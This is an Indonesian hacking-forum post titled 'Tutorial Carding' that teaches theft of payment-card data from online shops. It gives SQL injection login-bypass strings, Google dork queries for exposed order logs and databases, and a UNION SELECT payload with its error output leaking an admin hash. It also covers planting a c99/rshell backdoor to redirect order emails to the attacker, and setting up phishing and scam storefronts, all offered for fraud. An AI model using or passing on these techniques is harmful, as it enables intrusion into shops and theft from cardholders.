Cyber-Toerdjo


Welcome To The Cybernet-Toerdjo Team.
 
IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Latest topics
» salam kenal semuanya
Thu Sep 12, 2013 8:02 pm by Moon Drop

» Salam kenal ...
Thu Oct 25, 2012 4:40 pm by yudisrey

» Biar Akrab kenalan doloE
Thu Sep 06, 2012 1:28 pm by mr.pego

» security and hack FB
Tue Apr 03, 2012 10:56 pm by rifkigaoll

» Menjebol Password BIOS
Tue Apr 03, 2012 10:52 pm by rifkigaoll

» Sofware untuk menyembunyikan file apapun dalam sebuah media gambar.
Fri Mar 30, 2012 9:15 am by Cyber_Althaf

» Simulasi Pertambahan Carder
Fri Mar 02, 2012 11:02 am by musa55

» hack password facebook
Thu Feb 02, 2012 7:54 pm by lunnaii

» linknya mana
Wed Dec 07, 2011 9:46 pm by dragonov

December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar
Link Sponsor
FB
Banner Forum

BriGade




Share | 
 

 Tutorial Carding

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin



Jumlah posting : 74
Reputation : 3
Join date : 28.11.09
Age : 36
Lokasi : —¤÷('KuToardjoE')÷¤—

PostSubyek: Tutorial Carding   Tue Dec 01, 2009 6:15 pm

Tutorial Carding

Code:
Assallamualaikum Wr Wb

kembali lagi saya buad artikel :)
Ini berhubungan dengan carding loh, yang pasti anda udah tau semua dengan apa itu carding. Ini hal yang sangat menarik untuk di bahas dalam masalah ini. Ada beberapa teknik yang perlu anda ketahui tentang bagaimana itu carding. Pertama, gw akan jelaskan beberapa teknik menarik yang patut anda pelajari.
Udah lom ne gw ceramahnya.. Wkwkwkw.. Oke dah lanjut ya kita mulai, jangan lupa bilang terima kasih banyak sama paman google ya ( search engine yang pasti gw gunain dan menjadi guru dari pembelajaran dalam hal ini ).. Lets Go:

1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:

admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb

Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :

http://www.namasitusnya.com/shop/admin/shopadmin.asp

Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:

http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt

Selamat menemukan :)

3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.

Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^


4. SQL Injection Advanced Shop Vulnreabilty
# Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :

[color="Red"]DB ERROR 1064[/color]

[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]
Nah klo udah jangan lupa decrypt passwordnya ya :)

5. Admin Shop Send Mail Order
# Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.

Contoh:
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.

Nah gitu ajah dech dari gw, selamat berselancar dah, Segala tindak tanduk jadi tanggung jawab loe sendiri
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!

==================== [ credit by : DexteR ]======================= 
Kembali Ke Atas Go down
Lihat profil user http://cyber-toerdjo.forumotion.com
 
Tutorial Carding
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Tutorial Gear Design ?
» Tutorial Design Menggunakan Photoshop
» Apa tutorial kami bermanfaat ? [POLLING]
» [Tutorial] Effective Blog Exchange
» DIY - Cara pasang HID di NINJA 250

Permissions in this forum:Anda tidak dapat menjawab topik
Cyber-Toerdjo :: Hacking, Cracking, Carding :: Carding-
Navigasi: